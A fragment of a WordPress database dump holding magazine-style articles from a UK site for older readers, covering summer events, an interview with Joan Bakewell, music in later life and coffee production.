brilliant.”</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>','Smiling all the way to the dentist','749','publish','open','open','','smiling-all-the-way-to-the-dentist','','','2018-04-02 20:20:01','2018-04-02 20:20:01','',0,'http://westonspirit.org.uk/smiling-all-the-way-to-the-dentist.asp',0,'post','',0),(43,1,'2014-05-14 07:34:32','2014-05-14 07:34:32','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">13 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> jholt\" title=\"Posts by John Holt\" rel=\"author\"&gt;John Holt</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Summer’s not over yet\" st_url=\"http://westonspirit.org.uk/2011/08/summer%e2%80%99s-not-over-yet/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Summer’s not over yet\" st_url=\"http://westonspirit.org.uk/2011/08/summer%e2%80%99s-not-over-yet/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Summer’s not over yet\" st_url=\"http://westonspirit.org.uk/2011/08/summer%e2%80%99s-not-over-yet/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Summer’s not over yet\" st_url=\"http://westonspirit.org.uk/2011/08/summer%e2%80%99s-not-over-yet/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Summer’s not over yet\" st_url=\"http://westonspirit.org.uk/2011/08/summer%e2%80%99s-not-over-yet/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Relive 1066, feast on garlic beer, enjoy the sublime tones of Elgar or let the Red Arrows send a tingle down the spine. A look at what’s on around the UK</h4>&#13;\n<h3>What’s great outdoors?</h3>&#13;\n<ul><li>Those attuned to a more sedate way of seeing the world should flock to the UK Motorhome and Caravan Autumn Fair (3-4 September) at Newark Showground, Nottinghamshire. Go to <strong><em><a title=\"www.ukautumnfair.co.uk/home.html\" href=\"http://www.ukautumnfair.co.uk/home.html\" target=\"_blank\">www.ukautumnfair.co.uk/home.html</a></em></strong></li>&#13;\n<li>If feats of strength on dry land float your boat, look no further than the Braemar Gathering and Highland Games (left)on 3 September usually attended by the Queen, who stays at nearby Balmoral during the summer. Visit <em><strong><a title=\"www.braemargathering.org\" href=\"http://www.braemargathering.org/\" target=\"_blank\">www.braemargathering.org</a></strong></em></li>&#13;\n<li>It’s a landmark year for the Land Rover Burghley Horse Trials (above at Burghley House, Lincolnshire, 1-4 September). Not only is the event celebrating its 50th anniversary but also competition should be particularly fierce as Burghley is a qualifying show for the 2017 London Olympics. See<em> <strong><a title=\" www.burghley-horse.co.uk\" href=\"http:// www.burghley-horse.co.uk/\" target=\"_blank\">www.burghley-horse.co.uk</a></strong></em></li>&#13;\n<li>There’s a full calendar for those who enjoy watching others messing about on the river, creek and gully. At the Fowey Royal Regatta in Cornwall (seven days from 14 August,<em> <strong><a title=\" www.foweyroyalregatta.co.uk\" href=\"http:// www.foweyroyalregatta.co.uk/\" target=\"_blank\">www.foweyroyalregatta.co.uk</a></strong></em>) attractions include the Red Arrows, a colourful procession around the town and, of course, the sailing races. Torbay Week (19-24 August, <em><strong><a title=\"www.torbayweek.co.uk\" href=\"http://www.torbayweek.co.uk/\" target=\"_blank\">www.torbayweek.co.uk</a></strong></em>) features racing for a wide variety of sailing vessels, along with tons of after-sail fun at Torbay’s sailing and yachting clubs.</li>&#13;\n</ul><h3>Glorious, glorious food</h3>&#13;\n<ul><li>If you’re looking for a summer event with a unique atmosphere, then the Isle of Wight Garlic Festival should be to your taste. Held over the weekend of 20-21 August at the evocatively-named Fighting Cocks Crossroads site near Sandown, the festival is, according to Colin Boswell who runs the island’s Garlic Farm, “a nice blend of 1960s and ’70s pop festival with the feel of a country fair and little bit of leading edge foodie experience”. Around 25,000 people are expected through the gates to enjoy the tastings, sideshows, displays and demonstrations. “We do the usual things like garlic ice cream and garlic beer,” says Boswell. “For the beer, you crush garlic in a glass and pour ice cold lager on it so you drink through a skin of garlic. It reaches the parts other beers cannot reach. The Isle of Wight’s garlic history goes back to the war when a Free French brigade was stationed on the island and became disenchanted with the bland food they were offered. A local farmer managed to import some garlic from the Auvergne. The islanders found it grew really well and it kept the French happy for a while. And is the Garlic Festival the event you can experience before you reach the Garlic days on the Isle of Wightsite? “In August when we have 100 tons of garlic on the floor and we’re busy cleaning, drying and doing things with it, then I’m sure there’s a sweet aroma in the air, not a harsh one,” says Boswell. For festival details see <em><strong><a title=\"www.garlic-festival.co.uk\" href=\"http://www.garlic-festival.co.uk/\" target=\"_blank\">www.garlic-festival.co.uk</a></strong></em></li>&#13;\n<li>The Wirral Food and Drink Festival (28-29 August) features an appearance by Claire Lara, the first female winner of TV’s Masterchef: The Professionals who grew up in the area. “My life is just cooking. It’s a brilliant, brilliant job,” she says. “I teach youngsters, we give them a trade, give them an opportunity, give them options. I get a lot of satisfaction from passing on knowledge, I just really enjoy it.” Visit <em><strong><a title=\"www.visitwirral.com\" href=\"http://www.visitwirral.com/\" target=\"_blank\">www.visitwirral.com</a></strong></em></li>&#13;\n</ul><h3>Tales of the centuries</h3>&#13;\n<p>It’s not merely music fans who spend summer weekends in wet and windy festival fields being bombarded by noise and enduring often indifferent living conditions.</p>&#13;\n<p>Thousands of history re-enactors get away from it all by donning the costumes, eating the food and wielding the weapons of centuries gone by during staged events at many of the country’s castles and stately homes.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-811\" style=\"border-style: initial; border-color: initial;\" title=\"Sca-08-362-Raw-Unc-\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /></p>&#13;\n<p>Those not brave enough to slip into something a little less comfortable such as sackcloth or suits of armour can go along to see historical characters brought back to life, turning points of our past re-visited and traditional crafts re-interpreted by an armyof enthusiasts.</p>&#13;\n<p>Jasmine and Mike Richards (below) have been re-enacting for 40 years and this summer’s battle plans include the Eve of the Battle event at the National Museum of Wales in St Fagan’s, near Cardiff, on August 13 and 14. The museum site is close to one of the Civil War’s bloodiest encounters. “We’ll be part on an extended family based in a house in the woods, cooking, carrying out crafts and coming to terms with our daily lives having been taken away by the invading Army,” says 72-year-old Jasmine.</p>&#13;\n<p>Former teacher Jasmine was bitten by the history bug when her 11-year-old son – now a computer programmer in his late 40s with his own Civil War re-enacting group – asked for some Napoleonic costumes for a history project. It was a short cavalry ride from there to the brigades of folk re-enacting the Civil War. When they retired in 1994, the Richards were ready for full-time duty.</p>&#13;\n<p>She remembers watching her 67-year-old husband getting caught in the thick of the action during one campaign, hiding in a ditch with his camera with horses leaping over him. “On re-enactment weekends, you lose all sense of time; you have jobs you know need doing but there’s really only daylight and night-time with the odd church bell now and again.”</p>&#13;\n<ul><li> If bows and arrows appeal more than muskets and drums, you can re-live the atmosphere and tension of medieval battle in the annual re-enactment of the 1066 Battle of Hastings on the very field where it took place over the weekend of October 15-16. There are also medieval encampments, cavalry and falconry displays and a chance to make your own chain mail. See <em><strong><a title=\"www.english-heritage.org.uk/daysout/properties/1066-battle-of-hastings-abbey-and-battlefield\" href=\"http://www.english-heritage.org.uk/daysout/properties/1066-battle-of-hastings-abbey-and-battlefield\" target=\"_blank\">www.english-heritage.org.uk/daysout/properties/1066-battle-of-hastings-abbey-and-battlefield</a></strong></em></li>&#13;\n<li>The Vikings come back to life at Lindisfarne Priory, Northumberland on 20-21 August. Don’t forget, however, that the site is an island at high tide; get your timings wrong and you could be stranded overnight with some of the most fearsome hordes in history (above). Visit <em><strong><a title=\"www.english-heritage.org.uk/daysout/properties/lindisfarne-priory\" href=\"http://www.english-heritage.org.uk/daysout/properties/lindisfarne-priory\" target=\"_blank\">www.english-heritage.org.uk/daysout/properties/lindisfarne-priory</a></strong></em></li>&#13;\n<li>Delving back further through history, Verulamium Museum in St Albans is invaded every second weekend in the month by Roman soldiers who demonstrate the tactics and equipment of the Imperial Army. Tel <strong>01727 751 810.</strong></li>&#13;\n<li>The Cannock Chase Military History weekend on August 20-21 celebrates Staffordshire’s military connections from the Civil War to the present day with static and arena demonstrations from both historians and service veterans. Tel <strong>01543 876741</strong>.</li>&#13;\n<li>Wimpole Hall in Cambridgeshire steps back in time to the 1940s over the weekend of 24-25 September with song and dance, military and civilian living history, cooking demonstrations, entertainments such as Mr Punch taking on Adolf Hitler and classic cars and bikes. Go to <em><strong><a title=\"www.wimpole.org\" href=\"http://www.wimpole.org/\" target=\"_blank\">www.wimpole.org</a></strong></em></li>&#13;\n<li>If staying indoors is more your thing, the State Rooms and Buckingham Palace are open to the beginning of October. Besides the treasures of the royal collection, there’s a chance to enjoy a slice of very contemporary history in the form of the Duchess of Cambridge’s wedding dress. Visit <em><strong><a title=\"www.royalcollection.org.uk\" href=\"http://www.royalcollection.org.uk/\" target=\"_blank\">www.royalcollection.org.uk</a></strong></em></li>&#13;\n<li>And during the summer recess, there are 75-minute guided tours of the Houses of Parliament. See <em><strong><a title=\"www.parliament.uk/visiting\" href=\"http://www.parliament.uk/visiting\" target=\"_blank\">www.parliament.uk/visiting</a></strong></em></li>&#13;\n</ul><h3>Music, words and numbers</h3>&#13;\n<ul><li>English music is at the heart of the Three Choirs Festival which this year takes place in Worcester Cathedral (below) until 13 August. Featured works include Elgar’s Dream of Gerontius and Vaughan Williams’ An Oxford Elegy. The tenth anniversary of 9/11 is marked with a performance of John Adams’ On the Transmigration of Souls, commissioned in 2002 and recalling the fall of the World Trade Center in New York. See <em><strong><a title=\"www.3choirs.org\" href=\"http://www.3choirs.org/\" target=\"_blank\">www.3choirs.org</a></strong></em></li>&#13;\n<li>This year’s Glyndebourne Festival culminates (11-28 August) with its renowned production of Benjamin Britten’s The Turn of the Screw in which two orphaned children and their governess are spooked out of their wits in a remote country house. Go to<em> <strong><a title=\" www.glyndebourne.com\" href=\"http:// www.glyndebourne.com/\" target=\"_blank\">www.glyndebourne.com</a></strong></em></li>&#13;\n<li> And don’t forget the Proms run until 10 September at London’s Royal Albert Hall. Visit <em><strong><a title=\"www.bbc.co.uk/proms\" href=\"http://www.bbc.co.uk/proms\" target=\"_blank\">www.bbc.co.uk/proms</a></strong></em></li>&#13;\n<li>On the literary front, the Edinburgh International Book Festival rounds off the city’s cultural extravaganza (13-29 August) and features Man Booker long-listed authors Sebastian Barry and Alan Hollinghurst. Visit <em><strong><a title=\"www.edbookfest.co.uk/the-festival\" href=\"http://www.edbookfest.co.uk/the-festival\" target=\"_blank\">www.edbookfest.co.uk/the-festival</a></strong></em></li>&#13;\n<li>The Scottish International Storytelling Festival (21-30 October) unites the Scottish Isles with the shores and islands of the Mediterranean in an exchange of cultures and traditions, tracing the story of travel through the voyager Odysseus. Meanwhile, old routes are reconnected in the Year ofScotland’s Islands with Island Nights evenings offering up the best of live entertainment. See <em><strong><a title=\"www.scottishstorytellingcentre.co.uk\" href=\"http://www.scottishstorytellingcentre.co.uk/\" target=\"_blank\">www.scottishstorytellingcentre.co.uk</a></strong></em></li>&#13;\n<li>This year’s Canterbury Festival (15-29 October, www.canterburyfestival.co.uk) is branching out from its traditional line-up of music, theatre and arts to dip a toe in scientific waters.Events this year include Lord Robert Winston examining the relationship between science, society and religion, stand-up mathematician Matt Parker’s “Your days are numbered” and rock physicist Dr Mark Lewney who provides a guided guitar tour through the science of music. The magnificent cathedral hosts an opening day concert by the Soweto Gospel Choir (above) while Shirley Hall hosts prog rock legends Caravan (above right). Find out more at <em><strong><a title=\"www.canterburyfestival.co.uk\" href=\"http://www.canterburyfestival.co.uk/\" target=\"_blank\">www.canterburyfestival.co.uk</a></strong></em></li>&#13;\n</ul><p> </p>&#13;\n									</div>','Summer’s not over yet','1459','publish','open','open','','summers-not-over-yet','','','2018-04-02 20:09:46','2018-04-02 20:09:46','',0,'http://westonspirit.org.uk/summers-not-over-yet.asp',0,'post','',0),(44,1,'2017-04-12 12:39:37','2017-04-12 12:39:37','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">13 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> mpaton\" title=\"Posts by Maureen Paton\" rel=\"author\"&gt;Maureen Paton</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"There is nothing like a dame . . .\" st_url=\"http://westonspirit.org.uk/2011/08/there-is-nothing-like-a-dame/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"There is nothing like a dame . . .\" st_url=\"http://westonspirit.org.uk/2011/08/there-is-nothing-like-a-dame/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"There is nothing like a dame . . .\" st_url=\"http://westonspirit.org.uk/2011/08/there-is-nothing-like-a-dame/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"There is nothing like a dame . . .\" st_url=\"http://westonspirit.org.uk/2011/08/there-is-nothing-like-a-dame/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"There is nothing like a dame . . .\" st_url=\"http://westonspirit.org.uk/2011/08/there-is-nothing-like-a-dame/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>. . . and there’s no one like Joan Bakewell. From ’60s chick to campaigner for the elderly, she’s still making news after five decades in the spotlight</h4>&#13;\n<p>It’s a measure of just how busy Joan Bakewell continues to be that it took me three attempts to schedule this interview.</p>&#13;\n<p>Not that the 78-year-old broadcaster and writer has added inaccessible divadom to the damehood she acquired in 2008, as Bakewell remains as friendly and approachable as ever since she became a Labour peer last year. But she’s slotting me into a hectic Sunday spent reading the final proofs of her second novel, She’s Leaving Home. And when asked about her typical working day, she laughs wryly and says: “There’s no such thing.”</p>&#13;\n<h4 style=\"font-size: 13px;\"><img class=\"alignright size-medium wp-image-816\" style=\"border-style: initial; border-color: initial;\" title=\"NEW3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW3-220x300.jpg\" alt=\"\" width=\"220\" height=\"300\" /></h4>&#13;\n<p>That’s the way she prefers it, describing herself as “a bit of a magpie because I like a little of lots of different things”. Alongside her most regular gigs – thrice-weekly sittings in the House of Lords and twice-weekly Pilates classes – she continues to relish “all the random stuff that turns up” in the life of a freelance. As one of our best-known TV presenters, she finds the offers still keep coming in – apart from in one area, of which more later. </p><div class=\"woo-sc-quote\"><p>“I don’t know what I’m supposed to feel like at my age. I live life to the full as much as I can”</p></div>&#13;\n<p>Bakewell made her name back in the ’60s as a menthol-cool, mini-skirted interviewer on BBC2’s ground-breaking topical talk show Late Night Line-Up, earning herself the nickname of “the thinking man’s crumpet” from the humorist Frank Muir. She has been an arts and current-affairs queen ever since, moving on from Newsnight to such influential TV documentary series as Heart of the Matter, which ran for 12 years, and Taboo, which investigated the sexual life of the nation.</p>&#13;\n<p>But she never forgot to have a life outside work. Now a grandmother of six, she has been married twice – to TV producer Michael Bakewell and to theatre director Jack Emery. Her private life even made headlines when her seven-year affair with the playwright Harold Pinter was later immortalised in his play Betrayal. Currently she’s single.</p>&#13;\n<p>“Am I having an affair now?” says Bakewell (her bold choice of words, not mine). “No, but I go out with a wide variety of friends of both sexes.”</p>&#13;\n<p>The post-war youthquake of high achievers from relatively lowly backgrounds like hers could be called the first truly liberated generation. Bakewell puts that down to the fact that “our wartime childhoods had been quite austere, so we came out roaring with enthusiasm, wanting to make the world a better place”.</p>&#13;\n<p>That same seventy-something generation is now at the centre of an elderquake revolution, refusing to be defined by their years. As Bakewell puts it: “I don’t know what I’m supposed to feel like at my age. I live life to the full as much as I can, and my children take my busy life for granted – I think they’re relieved I’m not a burden.”</p>&#13;\n<p>Appointed the voice for older people by Gordon Brown’s government in 2008, she stepped down as age tsar just before the 2010 election because, she explains: “I didn’t want to tie the subsequent incumbent with having me on their books – and also because I found the job overwhelming, since it was voluntary and therefore part-time.”</p>&#13;\n<p>Now she lobbies for England and Scotland to appoint a full-time paid commissioner instead, as in Wales and Northern Ireland, because she believes “there’s a need for a much bigger response to the old”.</p>&#13;\n<p>She continues to campaign on other issues, too. Having criticised the way sex is commodified, she now says: “I think we will probably go through quite a puritanical phase to redress the sleazy values till we get the balance right.”</p>&#13;\n<p>The only thing that temporarily put a stop to her gallop earlier this year has been a broken foot due to a stress fracture. “Although I’m better now, I can’t go round in high heels any more,” she says ruefully. “But I don’t do glamour any more. Sometimes I think I ought to find out about Botox, since people keep talking about it, but I don’t have the time or the need…”</p>&#13;\n<p>She remains much in demand on radio, presenting Radio 4’s Inside the Ethics Committee and the Radio 3 series Belief. And in September she will be on TV interviewing Sir David Frost about his historic interrogation of US president Richard Nixon in a Watergate/Nixon night on BBC2.</p>&#13;\n<p>Yet aside from being the occasional talking head on ageing issues or the ’60s, she admits: “I don’t have a TV career at all. I think the reason is because of age – the only people over 70 on TV now are David Dimbleby, Bruce Forsyth and David Attenborough. Your professional life does thin out as you get older.</p>&#13;\n<p>“But I’ve found other avenues. I’m having to learn quite late in the day how to write novels (her first, All the Nice Girls, was published in 2009) and I’m beginning to get stuck into law-making issues in the Lords. That’s all about current affairs, so there is a parallel with my TV career.”</p>&#13;\n<p>These days she makes her mark on television behind the scenes, it seems. In a recent New Statesman interview with Mark Thompson, she got the BBC’s director-general to take on board her arguments for more older women on screen, following Bakewell’s championing of deposed Countryfile presenter Miriam O’Reilly</p>&#13;\n<p>(who took the BBC to an employment tribunal for ageism and won).</p>&#13;\n<p>“Things are getting better for women in broadcasting, but I also think many women have less single-minded, driving ambition than men. Their lives are full of other satisfactions, which makes women more balanced human beings.</p>&#13;\n<p>“I wanted my life to encompass as many different things as possible, and that’s what I’ve done. I don’t really have any more ambitions workwise – I’d like it to be a little bit quieter really,” she adds.</p>&#13;\n<p>“I have signed a living will, but I feel so fit that I haven’t made any arrangements for my future care,” she concludes, telling me that she’s very keen on “this new architecture, this plan for houses to be built for life so that people don’t ever have to move out”. A pioneer to the last.</p>&#13;\n<p>Joan Bakewell’s interview with Sir David Frost will be on BBC2 in September. She’s Leaving Home will be published by Virago in November.</p>&#13;\n									</div>','There is nothing like a dame . . .','1070','publish','open','open','','there-is-nothing-like-a-dame','','','2018-04-02 20:09:45','2018-04-02 20:09:45','',0,'http://westonspirit.org.uk/there-is-nothing-like-a-dame.asp',0,'post','',0),(45,1,'2016-05-19 23:18:37','2016-05-19 23:18:37','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">9 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> llightfoot\" title=\"Posts by Liz Lightfoot\" rel=\"author\"&gt;Liz Lightfoot</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"They’re playing our song\" st_url=\"http://westonspirit.org.uk/2011/08/they%e2%80%99re-playing-our-song/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"They’re playing our song\" st_url=\"http://westonspirit.org.uk/2011/08/they%e2%80%99re-playing-our-song/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"They’re playing our song\" st_url=\"http://westonspirit.org.uk/2011/08/they%e2%80%99re-playing-our-song/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"They’re playing our song\" st_url=\"http://westonspirit.org.uk/2011/08/they%e2%80%99re-playing-our-song/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"They’re playing our song\" st_url=\"http://westonspirit.org.uk/2011/08/they%e2%80%99re-playing-our-song/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Enjoying music can be instrumental in increasing your quality of life, as growing numbers of older people have found</h4>&#13;\n<p>If music be the food of love, then play on – and lower your cholesterol, release pleasurable hormone dopamine and improve hearing ability in the process. That’s what scientists say, backed by an increasing portfolio of research into the effects of music on the brain.</p>&#13;\n<p>Not only does learning a musical instrument improve the reading ability and grasp of new languages in children, it also improves memory and hearing in later life, according to Dr Nina Kraus.</p>&#13;\n<h4 style=\"font-size: 13px;\"><img class=\"alignright size-medium wp-image-814\" style=\"border-style: initial; border-color: initial;\" title=\"Benslow Music Trust\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW2-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /></h4>&#13;\n<p>Studies by Kraus, the director of the Auditory Neuroscience Laboratory at Northwestern University in Illinois in the US, found 45- to 65-year-old musicians had significantly better memory for sounds and were more able to hear speech in noisy environments than those who did not play an instrument.</p>&#13;\n<p>“Older people commonly complain that they have difficulty hearing speech in noisy places and it can lead to social isolation and depression,” she says. “Playing music involves identifying and picking out relevant patterns, such as their own instrument, harmonies and rhythms. This musical training fine tunes the nervous system and bolsters the elements that combat age-related communication problems.” </p><div class=\"woo-sc-quote\"><p>“Playing in a band where no one takes themselves too seriously gives you the chance to just be yourself” – Ann Mundy, sax player</p></div>&#13;\n<p>But for the thousands of older people who take up instruments, singing and even conducting as adults, the motivation is far from medical. Freed from the duties of bringing up children or employment, they have the time to practise either an instrument they learnt as a child or master a completely new one.</p>&#13;\n<p>Music appreciation, bands and ensembles are popular activities with members of the University of the Third Age (U3A). In Bedford, for example, the poetry and folk group called the Willing Warblers has been going strong for nearly five and performs regularly in public.</p>&#13;\n<p>Keith Richards is a founder member of a U3A group in north London. Taking up the cello has proved to be one of the most challenging experiences of his life.</p>&#13;\n<p>“Starting to learn the cello is for people of seven, not 70. To really master it you need to start young,” he says.</p>&#13;\n<p>But start to master it he did, with the help of regular lessons, and he has gone on to join a music ensemble of like-minded people that meets every week. Now 79, the retired English literature teacher and lecturer says the joy of playing music with other people has less to do with age than the freedom to learn away from the regime of tests, exams and targets.</p>&#13;\n<p>His experience reflects Kraus’s US research. “I have become increasingly deaf when it comes to hearing people speak, but I don’t have a problem listening to music or picking out musical instruments. Playing has made me a better listener,” he says.</p>&#13;\n<p>Hobby musicians of all ages and abilities attend courses, seminars and concerts at Benslow Music Trust, a charitable trust in Hitchin, Hertfordshire, and while players in their teens and 20s join the busy programme of day and residential courses, most students are beyond retirement age.</p>&#13;\n<p>Funded by its 1,500 members, legacies and donations, Benslow Music attracts many prominent musicians, composers and conductors such as Sir Peter Maxwell Davies, Master of the Queen’s Music, to lead its events. The residential aspect of activities is also very important, providing a sense of solidarity and mutual adventure, according to Stephen Pettitt, Benslow’s director of music.</p>&#13;\n<p>“We have people of great spirit and huge enthusiasm who end the day utterly exhausted but exhilarated by what they have achieved,” he says. “Music isn’t just sound but sound plus different qualities of silence. It’s sensing those gradations, if you like, which make the process of listening and playing so deeply engaging.</p>&#13;\n<p>“The real art of listening – either as audience member, player or singer – involves bringing all your intelligent and sensory resources actively into the process so your brain can assimilate sounds and silences and make sense of them.”</p>&#13;\n<p>Those musicians who go on to form amateur bands and musical ensembles find themselves much in demand – and age is no bar. Both the clarinet and trumpet players for Stoke-on-Trent’s Sweet Melody Dreamboat Band are in their mid-80s.</p>&#13;\n<p>Meanwhile, saxophone player Ann Mundy, 56, took up the instrument years ago after buying it for her children who rejected it as too heavy.</p>&#13;\n<p>“They were having clarinet lessons and I asked the teacher if he would teach me the saxophone. I got to grade six and then I stoppedin my mid-40s because I didn’t want to carry on taking lessons and doing exams,” she says.</p>&#13;\n<p>When she was about to take early retirement last year from her high-powered job as a quality manager for a brewing company, Mundy heard about how the band was being formed by U3A members so she went along one afternoon to play with them. “We meet every week and it is something I really look forward to,” she says.</p>&#13;\n<p>“At work I had to put on a corporate image, which did not leave much room for self-expression. Playing in a band where no one takes themselves too seriously gives you the chance to just be yourself,” she says.</p>&#13;\n<p>For band leader Chris Latham, 72, who plays the sax and arranges the music, he is following a family tradition which he rejected as a child. His grandfather set up one of the first dance halls in Stoke and persuaded all his children to play instruments and form a band.</p>&#13;\n<p>“My father played the violin and he was out playing three or four nights a week. I admired him greatly, but I didn’t take up an instrument,” he says. “However, later in my 30s, I taught myself the flute and played in a wind band and then took up the violin when I was 65, followed by the saxophone.”</p>&#13;\n<p>Just before he retired from his job as the managing director of a UK branch of a multinational gold refining company, he added the harmonica to his repertoire. He started a U3A harmonica group for beginners and, to his amazement, 25 people turned up.</p>&#13;\n<p>Before long he was putting out feelers for musicians to form a band. Five years on, Sweet Melody Dreamboat is in great demand, playing a broad range of dance, swing and modern music.</p>&#13;\n<p>“I’m never going to be a brilliant player, but I’m having fun and there is a huge social element to it,” he adds. “It’s good to take up new things at any age, it keeps the brain cells working and the thing about retirement is that it gives you the time to do it.”</p>&#13;\n									</div>','They’re playing our song','1112','publish','open','open','','theyre-playing-our-song','','','2018-04-02 20:09:43','2018-04-02 20:09:43','',0,'http://westonspirit.org.uk/theyre-playing-our-song.asp',0,'post','',0),(46,1,'2014-03-23 15:06:03','2014-03-23 15:06:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gstroud\" title=\"Posts by Gemma Stroud\" rel=\"author\"&gt;Gemma Stroud</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bean there, done that\" st_url=\"http://westonspirit.org.uk/2011/10/bean-there-done-that/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bean there, done that\" st_url=\"http://westonspirit.org.uk/2011/10/bean-there-done-that/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bean there, done that\" st_url=\"http://westonspirit.org.uk/2011/10/bean-there-done-that/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bean there, done that\" st_url=\"http://westonspirit.org.uk/2011/10/bean-there-done-that/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bean there, done that\" st_url=\"http://westonspirit.org.uk/2011/10/bean-there-done-that/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It’s big business but the simple fruit of a bush-like tree has a long journey ahead before it becomes the world’s best-loved beverage</h4>&#13;\n<p>It’s the energising elixir that has us scrambling around for vending machine shrapnel and circling the office kettle in packs. But how does a small red cherry end up as the tall, extra-hot, soya latte perched precariously on a dozing commuter’s lap?</p>&#13;\n<p></p><div id=\"attachment_1413\" class=\"wp-caption alignright\" style=\"width: 301px\"><img class=\"size-full wp-image-1413 \" title=\"5.1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/5.1-e1326381163423.jpg\" alt=\"\" width=\"291\" height=\"253\" /><p class=\"wp-caption-text\">Stage one: green fruit turns bright red when ripe</p></div>&#13;\n<p>Coffee is big business. The world’s second most traded product after oil, the British Coffee Association (BCA) estimated that in 2007 we spent £720m on curbing our caffeine cravings.</p>&#13;\n<p>But before it can take the edge off the afternoon sugar slump, coffee begins life as a cherry. Grown on small bush-like trees, the green fruit turns bright red when ripe and contains two seeds – the coffee beans. There are two main commercial types. Arabica, a refined and aromatic bean suited to high altitudes, and robusta, a bitter-tasting bean grown at low altitude.</p>&#13;\n<p>Coffee trees flourish in equatorial climates. According to the International Coffee Organisation (ICO), Brazil is the world’s largest coffee producer with around a third of global output, followed by Vietnam, Colombia and Indonesia.</p>&#13;\n<p>And far from adding a simple splash of hot water and a dash of milk, coffee production is a long and complex process. The coffee tree produces its first full crop after five years – once ripe, the berries are harvested, processed and dried down on large sun trays. They are then bagged up and sold on to co-operatives.</p>&#13;\n<p></p><div id=\"attachment_1417\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1417\" title=\"5\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/5.jpg\" alt=\"\" width=\"596\" height=\"452\" /><p class=\"wp-caption-text\">Stage two: berries are harvested, processed and dried</p></div>&#13;\n<p>The standard unit of coffee trading is 60kg and the BCA estimates that 133m 60kg bags will be traded in the year between October 2016 and October 2017.</p>&#13;\n<p>According to the ICO, there are 25m coffee farmers worldwide, 70 per cent of whom are small landowners. Dr Euan Paul, executive director of the BCA, says certification schemes have helped improve the stability of the coffee market and the living conditions of those who rely on it.</p>&#13;\n<p></p><div id=\"attachment_1414\" class=\"wp-caption alignleft\" style=\"width: 310px\"><img class=\"size-medium wp-image-1414\" title=\"5.2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/5.2-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /><p class=\"wp-caption-text\">Stage three: beans are roasted to release flavour and aroma</p></div>&#13;\n<p>“The environmental, economic and social implications of coffee production are at the forefront of everyone’s minds. Schemes aim to ensure everything from fairer prices and building schools to minimising water usage and pollution in the processing stages,” he says.</p>&#13;\n<p>UK coffee manufacturers buy the majority of their green beans from exporters or international trading houses. In this state, the beans pack very little punch and, according to Martin Wattam of the ICO, it’s all in the roast.</p>&#13;\n<p></p><div id=\"attachment_1415\" class=\"wp-caption alignright\" style=\"width: 303px\"><img class=\"size-full wp-image-1415\" title=\"Coffee\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/5.3-e1326381604267.jpg\" alt=\"\" width=\"293\" height=\"237\" /><p class=\"wp-caption-text\">Stage four: beans are ground 